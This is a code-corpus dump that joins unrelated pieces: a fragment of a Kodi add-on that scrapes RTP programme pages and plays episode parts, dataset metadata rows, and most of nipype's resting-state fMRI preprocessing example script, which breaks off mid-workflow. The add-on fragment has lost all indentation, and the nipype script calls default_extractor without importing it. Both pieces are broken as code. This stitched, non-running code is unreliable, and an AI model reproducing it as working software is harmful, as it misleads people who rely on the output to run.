text = readfile(os.path.join(datapath,'searchprog.txt'))
list_show_search(text)
def list_show_search(url):
try:
page_source = abrir_url(url)
except:
page_source = ''
msgok(translate(30001),translate(30018))
if page_source:
program_list=re.findall('<section>(.+?)</section>',page_source,re.DOTALL)
if program_list:
match = re.findall('href="(.+?)".*?itemprop="name">(.+?)</b',program_list[0],re.DOTALL)
if match:
totalit = len(match)
for urlsbase,titulo in match:
if selfAddon.getSetting('icon_plot') == 'true':
try:
source = abrir_url(base_url + urlsbase)
sinopse=re.findall('id="promo">.+?\n.+?<p>(.*?)</p>', source, re.DOTALL)
if sinopse: plot = clean_html(title_clean_up(sinopse[0]))
information={ "Title": title_clean_up(titulo),"plot":plot }
try: thumbnail=img_base_url + re.compile('src=(.+?)&').findall(source)[0]
except: thumbnail=''
except: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
else: information={ "Title": title_clean_up(titulo),"plot":translate(30026) };thumbnail=''
addprograma(title_clean_up(titulo),base_url + urlsbase,16,thumbnail,totalit,information)
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')
setview('show-view')
else: msgok(translate(30001),translate(30032));sys.exit(0)
def get_show_episode_parts(name,url,iconimage):
try:
source = abrir_url(url)
except: source = ''
if source:
url_video_list = []
video_list = []
match = re.compile('href="(.+?)" title="Parte.+?" rel="nofollow"').findall(source)
print match
#match = re.compile("<a.+?href='(.+?)'><b>Parte</b>(.+?)</a>").findall(source)
if not match: url_video_list.append(url)
else:
for urlsbase in match:
url_video_list.append(base_url + urlsbase)
number_of_parts = len(url_video_list)
dp = xbmcgui.DialogProgress()
dp.create(translate(30001),translate(30033))
dp.update(0)
i=0
for part in url_video_list:
if dp.iscanceled(): dp.close()
i += 1
video_url = rtp_resolver(part)
if video_url: video_list.append(video_url)
else:pass
dp.update(int((float(i)/number_of_parts)*100), translate(30033))
try:
dp.update(100, translate(30033))
dp.close()
except: pass
playlist = xbmc.PlayList(1)
playlist.clear()
for video in video_list:
liz=xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=iconimage)
liz.setInfo('Video', {})
liz.setProperty('mimetype', 'video')
playlist.add(video, liz)
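	# Note (added for clarity): the playlist is started twice below, first
	# through a plain xbmc.Player and then through the custom RTPPlayer; the
	# second call supersedes the first and is the instance whose
	# _playbackLock loop is polled.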
xbmcPlayer = xbmc.Player()
xbmcPlayer.play(playlist)
player = RTPPlayer(videoarray=video_list,mainurl=url)
player.play(playlist)
while player._playbackLock:
player._trackPosition()
xbmc.sleep(1000)
else:msgok(translate(30001),translate(30018));sys.exit(0)
|
gpl-2.0
| 1,384,147,035,772,757,500
| 39.08547
| 181
| 0.667271
| false
| 2.860628
| false
| false
| false
|
carolFrohlich/nipype
|
examples/rsfmri_vol_surface_preprocessing.py
|
2
|
42451
|
#!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
====================================
rsfMRI: ANTS, FS, FSL, SPM, aCompCor
====================================
A preprocessing workflow for Siemens resting state data.
This workflow makes use of:
- ANTS
- FreeSurfer
- FSL
- SPM
- CompCor
For example::
python rsfmri_preprocessing.py -d /data/12345-34-1.dcm -f /data/Resting.nii
-s subj001 -o output -p PBS --plugin_args "dict(qsub_args='-q many')"
or
python rsfmri_vol_surface_preprocessing.py -f SUB_1024011/E?/func/rest.nii
-t OASIS-30_Atropos_template_in_MNI152_2mm.nii.gz --TR 2 -s SUB_1024011
--subjects_dir fsdata --slice_times 0 17 1 18 2 19 3 20 4 21 5 22 6 23
7 24 8 25 9 26 10 27 11 28 12 29 13 30 14 31 15 32 16 -o .
This workflow takes resting timeseries and a Siemens dicom file corresponding
to it and preprocesses it to produce timeseries coordinates or grayordinates.
This workflow also requires 2mm subcortical atlas and templates that are
available from:
http://mindboggle.info/data.html
specifically the 2mm versions of:
- `Joint Fusion Atlas <http://mindboggle.info/data/atlases/jointfusion/OASIS-TRT-20_jointfusion_DKT31_CMA_labels_in_MNI152_2mm_v2.nii.gz>`_
- `MNI template <http://mindboggle.info/data/templates/ants/OASIS-30_Atropos_template_in_MNI152_2mm.nii.gz>`_
"""
from __future__ import division, unicode_literals
from builtins import open, range, str
import os
from nipype.interfaces.base import CommandLine
CommandLine.set_default_terminal_output('allatonce')
from dicom import read_file
from nipype.interfaces import (spm, fsl, Function, ants, freesurfer)
from nipype.interfaces.c3 import C3dAffineTool
fsl.FSLCommand.set_default_output_type('NIFTI')
from nipype import Workflow, Node, MapNode
from nipype.interfaces import matlab as mlab
mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodisplay")
# If SPM is not in your MATLAB path you should add it here
# mlab.MatlabCommand.set_default_paths('/software/matlab/spm12')
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.algorithms.misc import TSNR
from nipype.interfaces.utility import Rename, Merge, IdentityInterface
from nipype.utils.filemanip import filename_to_list
from nipype.interfaces.io import DataSink, FreeSurferSource
import numpy as np
import scipy as sp
import nibabel as nb
imports = ['import os',
'import nibabel as nb',
'import numpy as np',
'import scipy as sp',
'from nipype.utils.filemanip import filename_to_list, list_to_filename, split_filename',
'from scipy.special import legendre'
]
def get_info(dicom_files):
    """Given a Siemens dicom file return metadata
Returns
-------
RepetitionTime
Slice Acquisition Times
Spacing between slices
"""
meta = default_extractor(read_file(filename_to_list(dicom_files)[0],
stop_before_pixels=True,
force=True))
return (meta['RepetitionTime'] / 1000., meta['CsaImage.MosaicRefAcqTimes'],
meta['SpacingBetweenSlices'])
def median(in_files):
"""Computes an average of the median of each realigned timeseries
Parameters
----------
in_files: one or more realigned Nifti 4D time series
Returns
-------
out_file: a 3D Nifti file
"""
import numpy as np
import nibabel as nb
average = None
for idx, filename in enumerate(filename_to_list(in_files)):
img = nb.load(filename)
data = np.median(img.get_data(), axis=3)
if average is None:
average = data
else:
average = average + data
median_img = nb.Nifti1Image(average / float(idx + 1), img.affine,
img.header)
filename = os.path.join(os.getcwd(), 'median.nii.gz')
median_img.to_filename(filename)
return filename
def bandpass_filter(files, lowpass_freq, highpass_freq, fs):
"""Bandpass filter the input files
Parameters
----------
files: list of 4d nifti files
lowpass_freq: cutoff frequency for the low pass filter (in Hz)
highpass_freq: cutoff frequency for the high pass filter (in Hz)
fs: sampling rate (in Hz)
"""
from nipype.utils.filemanip import split_filename, list_to_filename
import numpy as np
import nibabel as nb
out_files = []
for filename in filename_to_list(files):
path, name, ext = split_filename(filename)
out_file = os.path.join(os.getcwd(), name + '_bp' + ext)
img = nb.load(filename)
timepoints = img.shape[-1]
F = np.zeros((timepoints))
lowidx = int(timepoints / 2) + 1
if lowpass_freq > 0:
            lowidx = int(np.round(lowpass_freq / fs * timepoints))
highidx = 0
if highpass_freq > 0:
            highidx = int(np.round(highpass_freq / fs * timepoints))
F[highidx:lowidx] = 1
F = ((F + F[::-1]) > 0).astype(int)
data = img.get_data()
if np.all(F == 1):
filtered_data = data
else:
filtered_data = np.real(np.fft.ifftn(np.fft.fftn(data) * F))
img_out = nb.Nifti1Image(filtered_data, img.affine, img.header)
img_out.to_filename(out_file)
out_files.append(out_file)
return list_to_filename(out_files)
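# Worked example (added for illustration): for a 100-volume run sampled at
# fs = 0.5 Hz (TR = 2s), lowpass_freq = 0.1 and highpass_freq = 0.01 give
# lowidx = round(0.1 / 0.5 * 100) = 20 and highidx = round(0.01 / 0.5 * 100)
# = 2, so FFT bins 2..19 and their mirrored counterparts are retained.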
def motion_regressors(motion_params, order=0, derivatives=1):
"""Compute motion regressors upto given order and derivative
motion + d(motion)/dt + d2(motion)/dt2 (linear + quadratic)
"""
import numpy as np
out_files = []
for idx, filename in enumerate(filename_to_list(motion_params)):
params = np.genfromtxt(filename)
out_params = params
for d in range(1, derivatives + 1):
cparams = np.vstack((np.repeat(params[0, :][None, :], d, axis=0),
params))
out_params = np.hstack((out_params, np.diff(cparams, d, axis=0)))
out_params2 = out_params
for i in range(2, order + 1):
out_params2 = np.hstack((out_params2, np.power(out_params, i)))
filename = os.path.join(os.getcwd(), "motion_regressor%02d.txt" % idx)
np.savetxt(filename, out_params2, fmt=b"%.10f")
out_files.append(filename)
return out_files
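# Shape note (added for illustration): with 6 motion parameters, derivatives=1
# first appends 6 temporal-difference columns (12 total), and order=2 then
# appends the squares of all 12, yielding 24 regressor columns per time point.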
def build_filter1(motion_params, comp_norm, outliers, detrend_poly=None):
"""Builds a regressor set comprisong motion parameters, composite norm and
outliers
The outliers are added as a single time point column for each outlier
Parameters
----------
motion_params: a text file containing motion parameters and its derivatives
comp_norm: a text file containing the composite norm
outliers: a text file containing 0-based outlier indices
detrend_poly: number of polynomials to add to detrend
Returns
-------
components_file: a text file containing all the regressors
"""
import numpy as np
import nibabel as nb
from scipy.special import legendre
out_files = []
for idx, filename in enumerate(filename_to_list(motion_params)):
params = np.genfromtxt(filename)
norm_val = np.genfromtxt(filename_to_list(comp_norm)[idx])
out_params = np.hstack((params, norm_val[:, None]))
try:
outlier_val = np.genfromtxt(filename_to_list(outliers)[idx])
except IOError:
outlier_val = np.empty((0))
for index in np.atleast_1d(outlier_val):
outlier_vector = np.zeros((out_params.shape[0], 1))
outlier_vector[index] = 1
out_params = np.hstack((out_params, outlier_vector))
if detrend_poly:
timepoints = out_params.shape[0]
X = np.empty((timepoints, 0))
for i in range(detrend_poly):
X = np.hstack((X, legendre(
i + 1)(np.linspace(-1, 1, timepoints))[:, None]))
out_params = np.hstack((out_params, X))
filename = os.path.join(os.getcwd(), "filter_regressor%02d.txt" % idx)
        np.savetxt(filename, out_params, fmt="%.10f")
out_files.append(filename)
return out_files
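# Small sketch of how build_filter1 turns a single outlier index into a
# one-hot regressor column (timepoints and index are illustrative):
def _demo_outlier_column(timepoints=5, outlier_index=2):
    import numpy as np
    outlier_vector = np.zeros((timepoints, 1))
    outlier_vector[outlier_index] = 1
    return outlier_vector.ravel().tolist()  # -> [0.0, 0.0, 1.0, 0.0, 0.0]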
def extract_noise_components(realigned_file, mask_file, num_components=5,
extra_regressors=None):
"""Derive components most reflective of physiological noise
Parameters
----------
realigned_file: a 4D Nifti file containing realigned volumes
mask_file: a 3D Nifti file containing white matter + ventricular masks
num_components: number of components to use for noise decomposition
extra_regressors: additional regressors to add
Returns
-------
components_file: a text file containing the noise components
"""
from scipy.linalg.decomp_svd import svd
import numpy as np
import nibabel as nb
import os
imgseries = nb.load(realigned_file)
components = None
for filename in filename_to_list(mask_file):
mask = nb.load(filename).get_data()
if len(np.nonzero(mask > 0)[0]) == 0:
continue
voxel_timecourses = imgseries.get_data()[mask > 0]
voxel_timecourses[np.isnan(np.sum(voxel_timecourses, axis=1)), :] = 0
# remove mean and normalize by variance
# voxel_timecourses.shape == [nvoxels, time]
X = voxel_timecourses.T
stdX = np.std(X, axis=0)
stdX[stdX == 0] = 1.
stdX[np.isnan(stdX)] = 1.
stdX[np.isinf(stdX)] = 1.
X = (X - np.mean(X, axis=0)) / stdX
u, _, _ = svd(X, full_matrices=False)
if components is None:
components = u[:, :num_components]
else:
components = np.hstack((components, u[:, :num_components]))
if extra_regressors:
regressors = np.genfromtxt(extra_regressors)
components = np.hstack((components, regressors))
components_file = os.path.join(os.getcwd(), 'noise_components.txt')
    np.savetxt(components_file, components, fmt="%.10f")
return components_file
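# A minimal CompCor-style sketch on synthetic data: demean and
# variance-normalize the voxel timecourses, then keep the first left
# singular vectors as noise regressors, as done above. All shapes are
# illustrative.
def _demo_compcor(nvoxels=50, timepoints=20, num_components=5):
    import numpy as np
    from scipy.linalg import svd
    X = np.random.randn(timepoints, nvoxels)
    X = (X - np.mean(X, axis=0)) / np.std(X, axis=0)
    u, _, _ = svd(X, full_matrices=False)
    return u[:, :num_components].shape  # -> (20, 5)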
def rename(in_files, suffix=None):
from nipype.utils.filemanip import (filename_to_list, split_filename,
list_to_filename)
out_files = []
for idx, filename in enumerate(filename_to_list(in_files)):
_, name, ext = split_filename(filename)
if suffix is None:
out_files.append(name + ('_%03d' % idx) + ext)
else:
out_files.append(name + suffix + ext)
return list_to_filename(out_files)
def get_aparc_aseg(files):
"""Return the aparc+aseg.mgz file"""
for name in files:
if 'aparc+aseg.mgz' in name:
return name
raise ValueError('aparc+aseg.mgz not found')
def extract_subrois(timeseries_file, label_file, indices):
"""Extract voxel time courses for each subcortical roi index
Parameters
----------
timeseries_file: a 4D Nifti file
label_file: a 3D file containing rois in the same space/size of the 4D file
indices: a list of indices for ROIs to extract.
Returns
-------
out_file: a text file containing time courses for each voxel of each roi
The first four columns are: freesurfer index, i, j, k positions in the
label file
"""
    from nipype.utils.filemanip import split_filename
    import numpy as np
    import nibabel as nb
    import os
img = nb.load(timeseries_file)
data = img.get_data()
roiimg = nb.load(label_file)
rois = roiimg.get_data()
prefix = split_filename(timeseries_file)[1]
out_ts_file = os.path.join(os.getcwd(), '%s_subcortical_ts.txt' % prefix)
with open(out_ts_file, 'wt') as fp:
for fsindex in indices:
ijk = np.nonzero(rois == fsindex)
ts = data[ijk]
for i0, row in enumerate(ts):
fp.write('%d,%d,%d,%d,' % (fsindex, ijk[0][i0],
ijk[1][i0], ijk[2][i0]) +
','.join(['%.10f' % val for val in row]) + '\n')
return out_ts_file
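# Sketch of the per-voxel line format written above (values illustrative):
# FreeSurfer label index, the voxel's i/j/k coordinates in the label volume,
# then the voxel's full time series.
def _demo_subroi_line(fsindex=17, ijk=(32, 45, 21), ts=(0.1, 0.2)):
    return ('%d,%d,%d,%d,' % ((fsindex,) + tuple(ijk)) +
            ','.join(['%.10f' % val for val in ts]))
# _demo_subroi_line() -> '17,32,45,21,0.1000000000,0.2000000000'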
def combine_hemi(left, right):
"""Combine left and right hemisphere time series into a single text file
"""
    import os
    import numpy as np
    import nibabel as nb
lh_data = nb.load(left).get_data()
rh_data = nb.load(right).get_data()
indices = np.vstack((1000000 + np.arange(0, lh_data.shape[0])[:, None],
2000000 + np.arange(0, rh_data.shape[0])[:, None]))
all_data = np.hstack((indices, np.vstack((lh_data.squeeze(),
rh_data.squeeze()))))
filename = left.split('.')[1] + '_combined.txt'
np.savetxt(filename, all_data,
fmt=','.join(['%d'] + ['%.10f'] * (all_data.shape[1] - 1)))
return os.path.abspath(filename)
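# Sketch of the vertex indexing convention used above: left-hemisphere
# vertices are offset by 1,000,000 and right-hemisphere vertices by
# 2,000,000 so both hemispheres fit in one table without colliding.
def _demo_hemi_indices(n_lh=3, n_rh=2):
    import numpy as np
    return np.vstack((1000000 + np.arange(n_lh)[:, None],
                      2000000 + np.arange(n_rh)[:, None])).ravel().tolist()
# -> [1000000, 1000001, 1000002, 2000000, 2000001]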
def create_reg_workflow(name='registration'):
"""Create a FEAT preprocessing workflow together with freesurfer
Parameters
----------
name : name of workflow (default: 'registration')
Inputs::
inputspec.source_files : files (filename or list of filenames to register)
inputspec.mean_image : reference image to use
inputspec.anatomical_image : anatomical image to coregister to
inputspec.target_image : registration target
Outputs::
outputspec.func2anat_transform : FLIRT transform
outputspec.anat2target_transform : FLIRT+FNIRT transform
outputspec.transformed_files : transformed files in target space
outputspec.transformed_mean : mean image in target space
"""
register = Workflow(name=name)
inputnode = Node(interface=IdentityInterface(fields=['source_files',
'mean_image',
'subject_id',
'subjects_dir',
'target_image']),
name='inputspec')
outputnode = Node(interface=IdentityInterface(fields=['func2anat_transform',
'out_reg_file',
'anat2target_transform',
'transforms',
'transformed_mean',
'segmentation_files',
'anat2target',
'aparc'
]),
name='outputspec')
# Get the subject's freesurfer source directory
fssource = Node(FreeSurferSource(),
name='fssource')
fssource.run_without_submitting = True
register.connect(inputnode, 'subject_id', fssource, 'subject_id')
register.connect(inputnode, 'subjects_dir', fssource, 'subjects_dir')
convert = Node(freesurfer.MRIConvert(out_type='nii'),
name="convert")
register.connect(fssource, 'T1', convert, 'in_file')
# Coregister the median to the surface
bbregister = Node(freesurfer.BBRegister(),
name='bbregister')
bbregister.inputs.init = 'fsl'
bbregister.inputs.contrast_type = 't2'
bbregister.inputs.out_fsl_file = True
bbregister.inputs.epi_mask = True
register.connect(inputnode, 'subject_id', bbregister, 'subject_id')
register.connect(inputnode, 'mean_image', bbregister, 'source_file')
register.connect(inputnode, 'subjects_dir', bbregister, 'subjects_dir')
"""
    Estimate the tissue classes from the anatomical image using FSL's FAST
    on the skull-stripped T1.
"""
stripper = Node(fsl.BET(), name='stripper')
register.connect(convert, 'out_file', stripper, 'in_file')
fast = Node(fsl.FAST(), name='fast')
register.connect(stripper, 'out_file', fast, 'in_files')
"""
Binarize the segmentation
"""
binarize = MapNode(fsl.ImageMaths(op_string='-nan -thr 0.9 -ero -bin'),
iterfield=['in_file'],
name='binarize')
register.connect(fast, 'partial_volume_files', binarize, 'in_file')
"""
Apply inverse transform to take segmentations to functional space
"""
applyxfm = MapNode(freesurfer.ApplyVolTransform(inverse=True,
interp='nearest'),
iterfield=['target_file'],
name='inverse_transform')
register.connect(inputnode, 'subjects_dir', applyxfm, 'subjects_dir')
register.connect(bbregister, 'out_reg_file', applyxfm, 'reg_file')
register.connect(binarize, 'out_file', applyxfm, 'target_file')
register.connect(inputnode, 'mean_image', applyxfm, 'source_file')
"""
Apply inverse transform to aparc file
"""
aparcxfm = Node(freesurfer.ApplyVolTransform(inverse=True,
interp='nearest'),
name='aparc_inverse_transform')
register.connect(inputnode, 'subjects_dir', aparcxfm, 'subjects_dir')
register.connect(bbregister, 'out_reg_file', aparcxfm, 'reg_file')
register.connect(fssource, ('aparc_aseg', get_aparc_aseg),
aparcxfm, 'target_file')
register.connect(inputnode, 'mean_image', aparcxfm, 'source_file')
"""
Convert the BBRegister transformation to ANTS ITK format
"""
convert2itk = Node(C3dAffineTool(), name='convert2itk')
convert2itk.inputs.fsl2ras = True
convert2itk.inputs.itk_transform = True
register.connect(bbregister, 'out_fsl_file', convert2itk, 'transform_file')
register.connect(inputnode, 'mean_image', convert2itk, 'source_file')
register.connect(stripper, 'out_file', convert2itk, 'reference_file')
"""
Compute registration between the subject's structural and MNI template
This is currently set to perform a very quick registration. However, the
registration can be made significantly more accurate for cortical
    structures by increasing the number of iterations.
    All parameters are set using the example from:
#https://github.com/stnava/ANTs/blob/master/Scripts/newAntsExample.sh
"""
reg = Node(ants.Registration(), name='antsRegister')
reg.inputs.output_transform_prefix = "output_"
reg.inputs.transforms = ['Rigid', 'Affine', 'SyN']
reg.inputs.transform_parameters = [(0.1,), (0.1,), (0.2, 3.0, 0.0)]
reg.inputs.number_of_iterations = [[10000, 11110, 11110]] * 2 + [[100, 30, 20]]
reg.inputs.dimension = 3
reg.inputs.write_composite_transform = True
reg.inputs.collapse_output_transforms = True
reg.inputs.initial_moving_transform_com = True
reg.inputs.metric = ['Mattes'] * 2 + [['Mattes', 'CC']]
reg.inputs.metric_weight = [1] * 2 + [[0.5, 0.5]]
reg.inputs.radius_or_number_of_bins = [32] * 2 + [[32, 4]]
reg.inputs.sampling_strategy = ['Regular'] * 2 + [[None, None]]
reg.inputs.sampling_percentage = [0.3] * 2 + [[None, None]]
reg.inputs.convergence_threshold = [1.e-8] * 2 + [-0.01]
reg.inputs.convergence_window_size = [20] * 2 + [5]
reg.inputs.smoothing_sigmas = [[4, 2, 1]] * 2 + [[1, 0.5, 0]]
reg.inputs.sigma_units = ['vox'] * 3
reg.inputs.shrink_factors = [[3, 2, 1]] * 2 + [[4, 2, 1]]
reg.inputs.use_estimate_learning_rate_once = [True] * 3
reg.inputs.use_histogram_matching = [False] * 2 + [True]
reg.inputs.winsorize_lower_quantile = 0.005
reg.inputs.winsorize_upper_quantile = 0.995
reg.inputs.float = True
reg.inputs.output_warped_image = 'output_warped_image.nii.gz'
reg.inputs.num_threads = 4
reg.plugin_args = {'qsub_args': '-l nodes=1:ppn=4'}
register.connect(stripper, 'out_file', reg, 'moving_image')
register.connect(inputnode, 'target_image', reg, 'fixed_image')
"""
Concatenate the affine and ants transforms into a list
"""
merge = Node(Merge(2), iterfield=['in2'], name='mergexfm')
register.connect(convert2itk, 'itk_transform', merge, 'in2')
register.connect(reg, 'composite_transform', merge, 'in1')
"""
Transform the mean image. First to anatomical and then to target
"""
warpmean = Node(ants.ApplyTransforms(), name='warpmean')
warpmean.inputs.input_image_type = 3
warpmean.inputs.interpolation = 'Linear'
warpmean.inputs.invert_transform_flags = [False, False]
warpmean.inputs.terminal_output = 'file'
warpmean.inputs.args = '--float'
warpmean.inputs.num_threads = 4
register.connect(inputnode, 'target_image', warpmean, 'reference_image')
register.connect(inputnode, 'mean_image', warpmean, 'input_image')
register.connect(merge, 'out', warpmean, 'transforms')
"""
Assign all the output files
"""
register.connect(reg, 'warped_image', outputnode, 'anat2target')
register.connect(warpmean, 'output_image', outputnode, 'transformed_mean')
register.connect(applyxfm, 'transformed_file',
outputnode, 'segmentation_files')
register.connect(aparcxfm, 'transformed_file',
outputnode, 'aparc')
register.connect(bbregister, 'out_fsl_file',
outputnode, 'func2anat_transform')
register.connect(bbregister, 'out_reg_file',
outputnode, 'out_reg_file')
register.connect(reg, 'composite_transform',
outputnode, 'anat2target_transform')
register.connect(merge, 'out', outputnode, 'transforms')
return register
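# Hypothetical standalone use of the registration workflow (the paths are
# placeholders; in this script the inputs are wired up by create_workflow
# below instead):
#
#   reg = create_reg_workflow()
#   reg.inputs.inputspec.subject_id = 'sub001'
#   reg.inputs.inputspec.subjects_dir = '/path/to/subjects_dir'
#   reg.inputs.inputspec.mean_image = 'median.nii.gz'
#   reg.inputs.inputspec.target_image = 'target_template.nii.gz'
#   reg.base_dir = '/tmp/regwork'
#   reg.run()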
"""
Creates the main preprocessing workflow
"""
def create_workflow(files,
target_file,
subject_id,
TR,
slice_times,
norm_threshold=1,
num_components=5,
vol_fwhm=None,
surf_fwhm=None,
lowpass_freq=-1,
highpass_freq=-1,
subjects_dir=None,
sink_directory=os.getcwd(),
target_subject=['fsaverage3', 'fsaverage4'],
name='resting'):
wf = Workflow(name=name)
# Rename files in case they are named identically
name_unique = MapNode(Rename(format_string='rest_%(run)02d'),
iterfield=['in_file', 'run'],
name='rename')
name_unique.inputs.keep_ext = True
name_unique.inputs.run = list(range(1, len(files) + 1))
name_unique.inputs.in_file = files
realign = Node(interface=spm.Realign(), name="realign")
realign.inputs.jobtype = 'estwrite'
num_slices = len(slice_times)
slice_timing = Node(interface=spm.SliceTiming(), name="slice_timing")
slice_timing.inputs.num_slices = num_slices
slice_timing.inputs.time_repetition = TR
slice_timing.inputs.time_acquisition = TR - TR / float(num_slices)
slice_timing.inputs.slice_order = (np.argsort(slice_times) + 1).tolist()
slice_timing.inputs.ref_slice = int(num_slices / 2)
    # Compute TSNR on realigned data, regressing out polynomials up to order 2
tsnr = MapNode(TSNR(regress_poly=2), iterfield=['in_file'], name='tsnr')
wf.connect(slice_timing, 'timecorrected_files', tsnr, 'in_file')
# Compute the median image across runs
calc_median = Node(Function(input_names=['in_files'],
output_names=['median_file'],
function=median,
imports=imports),
name='median')
wf.connect(tsnr, 'detrended_file', calc_median, 'in_files')
"""Segment and Register
"""
registration = create_reg_workflow(name='registration')
wf.connect(calc_median, 'median_file', registration, 'inputspec.mean_image')
registration.inputs.inputspec.subject_id = subject_id
registration.inputs.inputspec.subjects_dir = subjects_dir
registration.inputs.inputspec.target_image = target_file
"""Use :class:`nipype.algorithms.rapidart` to determine which of the
images in the functional series are outliers based on deviations in
intensity or movement.
"""
art = Node(interface=ArtifactDetect(), name="art")
art.inputs.use_differences = [True, True]
art.inputs.use_norm = True
art.inputs.norm_threshold = norm_threshold
art.inputs.zintensity_threshold = 9
art.inputs.mask_type = 'spm_global'
art.inputs.parameter_source = 'SPM'
"""Here we are connecting all the nodes together. Notice that we add the merge node only if you choose
to use 4D. Also `get_vox_dims` function is passed along the input volume of normalise to set the optimal
voxel sizes.
"""
wf.connect([(name_unique, realign, [('out_file', 'in_files')]),
(realign, slice_timing, [('realigned_files', 'in_files')]),
(slice_timing, art, [('timecorrected_files', 'realigned_files')]),
(realign, art, [('realignment_parameters', 'realignment_parameters')]),
])
def selectindex(files, idx):
import numpy as np
from nipype.utils.filemanip import filename_to_list, list_to_filename
return list_to_filename(np.array(filename_to_list(files))[idx].tolist())
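    # Illustrative behavior of the helper above (works on plain name lists;
    # no files needed). In this workflow it keeps FAST's first and third
    # partial-volume maps (indices 0 and 2) as the CompCor noise masks:
    #   selectindex(['pve_0.nii', 'pve_1.nii', 'pve_2.nii'], [0, 2])
    #   -> ['pve_0.nii', 'pve_2.nii']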
mask = Node(fsl.BET(), name='getmask')
mask.inputs.mask = True
wf.connect(calc_median, 'median_file', mask, 'in_file')
# get segmentation in normalized functional space
def merge_files(in1, in2):
out_files = filename_to_list(in1)
out_files.extend(filename_to_list(in2))
return out_files
# filter some noise
# Compute motion regressors
motreg = Node(Function(input_names=['motion_params', 'order',
'derivatives'],
output_names=['out_files'],
function=motion_regressors,
imports=imports),
name='getmotionregress')
wf.connect(realign, 'realignment_parameters', motreg, 'motion_params')
# Create a filter to remove motion and art confounds
createfilter1 = Node(Function(input_names=['motion_params', 'comp_norm',
'outliers', 'detrend_poly'],
output_names=['out_files'],
function=build_filter1,
imports=imports),
name='makemotionbasedfilter')
createfilter1.inputs.detrend_poly = 2
wf.connect(motreg, 'out_files', createfilter1, 'motion_params')
wf.connect(art, 'norm_files', createfilter1, 'comp_norm')
wf.connect(art, 'outlier_files', createfilter1, 'outliers')
filter1 = MapNode(fsl.GLM(out_f_name='F_mcart.nii',
out_pf_name='pF_mcart.nii',
demean=True),
iterfield=['in_file', 'design', 'out_res_name'],
name='filtermotion')
wf.connect(slice_timing, 'timecorrected_files', filter1, 'in_file')
wf.connect(slice_timing, ('timecorrected_files', rename, '_filtermotart'),
filter1, 'out_res_name')
wf.connect(createfilter1, 'out_files', filter1, 'design')
createfilter2 = MapNode(Function(input_names=['realigned_file', 'mask_file',
'num_components',
'extra_regressors'],
output_names=['out_files'],
function=extract_noise_components,
imports=imports),
iterfield=['realigned_file', 'extra_regressors'],
name='makecompcorrfilter')
createfilter2.inputs.num_components = num_components
wf.connect(createfilter1, 'out_files', createfilter2, 'extra_regressors')
wf.connect(filter1, 'out_res', createfilter2, 'realigned_file')
wf.connect(registration, ('outputspec.segmentation_files', selectindex, [0, 2]),
createfilter2, 'mask_file')
filter2 = MapNode(fsl.GLM(out_f_name='F.nii',
out_pf_name='pF.nii',
demean=True),
iterfield=['in_file', 'design', 'out_res_name'],
name='filter_noise_nosmooth')
wf.connect(filter1, 'out_res', filter2, 'in_file')
wf.connect(filter1, ('out_res', rename, '_cleaned'),
filter2, 'out_res_name')
wf.connect(createfilter2, 'out_files', filter2, 'design')
wf.connect(mask, 'mask_file', filter2, 'mask')
bandpass = Node(Function(input_names=['files', 'lowpass_freq',
'highpass_freq', 'fs'],
output_names=['out_files'],
function=bandpass_filter,
imports=imports),
name='bandpass_unsmooth')
bandpass.inputs.fs = 1. / TR
bandpass.inputs.highpass_freq = highpass_freq
bandpass.inputs.lowpass_freq = lowpass_freq
wf.connect(filter2, 'out_res', bandpass, 'files')
"""Smooth the functional data using
:class:`nipype.interfaces.spm.Smooth`.
"""
smooth = Node(interface=spm.Smooth(), name="smooth")
smooth.inputs.fwhm = vol_fwhm
wf.connect(bandpass, 'out_files', smooth, 'in_files')
collector = Node(Merge(2), name='collect_streams')
wf.connect(smooth, 'smoothed_files', collector, 'in1')
wf.connect(bandpass, 'out_files', collector, 'in2')
"""
Transform the remaining images. First to anatomical and then to target
"""
warpall = MapNode(ants.ApplyTransforms(), iterfield=['input_image'],
name='warpall')
warpall.inputs.input_image_type = 3
warpall.inputs.interpolation = 'Linear'
warpall.inputs.invert_transform_flags = [False, False]
warpall.inputs.terminal_output = 'file'
warpall.inputs.reference_image = target_file
warpall.inputs.args = '--float'
warpall.inputs.num_threads = 1
# transform to target
wf.connect(collector, 'out', warpall, 'input_image')
wf.connect(registration, 'outputspec.transforms', warpall, 'transforms')
mask_target = Node(fsl.ImageMaths(op_string='-bin'), name='target_mask')
wf.connect(registration, 'outputspec.anat2target', mask_target, 'in_file')
maskts = MapNode(fsl.ApplyMask(), iterfield=['in_file'], name='ts_masker')
wf.connect(warpall, 'output_image', maskts, 'in_file')
wf.connect(mask_target, 'out_file', maskts, 'mask_file')
# map to surface
# extract aparc+aseg ROIs
# extract subcortical ROIs
# extract target space ROIs
# combine subcortical and cortical rois into a single cifti file
#######
# Convert aparc to subject functional space
# Sample the average time series in aparc ROIs
sampleaparc = MapNode(freesurfer.SegStats(default_color_table=True),
iterfield=['in_file', 'summary_file',
'avgwf_txt_file'],
name='aparc_ts')
sampleaparc.inputs.segment_id = ([8] + list(range(10, 14)) + [17, 18, 26, 47] +
list(range(49, 55)) + [58] + list(range(1001, 1036)) +
list(range(2001, 2036)))
wf.connect(registration, 'outputspec.aparc',
sampleaparc, 'segmentation_file')
wf.connect(collector, 'out', sampleaparc, 'in_file')
def get_names(files, suffix):
"""Generate appropriate names for output files
"""
from nipype.utils.filemanip import (split_filename, filename_to_list,
list_to_filename)
out_names = []
for filename in files:
_, name, _ = split_filename(filename)
out_names.append(name + suffix)
return list_to_filename(out_names)
wf.connect(collector, ('out', get_names, '_avgwf.txt'),
sampleaparc, 'avgwf_txt_file')
wf.connect(collector, ('out', get_names, '_summary.stats'),
sampleaparc, 'summary_file')
# Sample the time series onto the surface of the target surface. Performs
# sampling into left and right hemisphere
target = Node(IdentityInterface(fields=['target_subject']), name='target')
target.iterables = ('target_subject', filename_to_list(target_subject))
samplerlh = MapNode(freesurfer.SampleToSurface(),
iterfield=['source_file'],
name='sampler_lh')
samplerlh.inputs.sampling_method = "average"
samplerlh.inputs.sampling_range = (0.1, 0.9, 0.1)
samplerlh.inputs.sampling_units = "frac"
samplerlh.inputs.interp_method = "trilinear"
